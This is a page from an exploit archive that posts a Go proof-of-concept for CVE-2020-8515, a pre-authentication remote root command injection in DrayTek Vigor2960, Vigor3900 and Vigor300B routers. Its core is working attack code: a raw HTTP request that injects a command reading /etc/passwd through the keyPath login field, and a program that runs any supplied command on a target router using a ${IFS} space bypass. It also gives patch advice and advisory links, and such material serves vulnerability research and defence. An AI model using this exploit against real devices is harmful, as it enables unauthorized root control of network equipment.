DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution: Posted Mar 31, 2020; Authored by 0xsha; DrayTek Vigor2960 version 1.3.1_Beta, Vigor3900 version 1.4.4_Beta, and Vigor300B versions 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta suffer from a remote command execution vulnerability.; tags | exploit, remote; advisories | CVE-2020-8515; SHA-256 | da216e7a3bcdc0e7690df8ecec6a4e14c871f9c105b3e89a4e2c3f6a11e45588; Download | Favorite | View

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

package main


/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 -  0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
read more :
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
exploiting using keyPath
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
 */

import (
  "fmt"
  "io/ioutil"
  "net/http"
  "net/url"
  "os"
  "strings"
)

func usage()  {

  fmt.Println("CVE-2020-8515 exploit by  @0xsha ")
  fmt.Println("Usage :  " + os.Args[0] + " URL " + "command"  )
  fmt.Println("E.G :  " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\""  )
}

func main() {


  if len(os.Args) < 3 {
    usage()
    os.Exit(-1)
  }

  targetUrl := os.Args[1]
  //cmd := "cat /etc/passwd"
  cmd := os.Args[2]


  // payload preparation
  vulnerableFile := "/cgi-bin/mainfunction.cgi"
  // specially crafted CMD
  // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
  payload :=`'
  /bin/sh -c 'CMD'
  '`
  payload = strings.ReplaceAll(payload,"CMD", cmd)
  bypass := strings.ReplaceAll(payload," ", "${IFS}")

  //PostForm call url encoder internally
  resp, err := http.PostForm(targetUrl+vulnerableFile ,
    url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"}   })

  if err != nil{
    fmt.Println("error connecting host")
    os.Exit(-1)
  }


  defer resp.Body.Close()
  body, err := ioutil.ReadAll(resp.Body)
  
  if err != nil{
    fmt.Println("error reading data")
    os.Exit(-1)
  }
  
  fmt.Println(string(body))

}

Top Authors In Last 30 Days

Red Hat 213 files
Ubuntu 90 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

Share This

DrayTek Vigor2960 / Vigor3900 / Vigor300B Remote Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems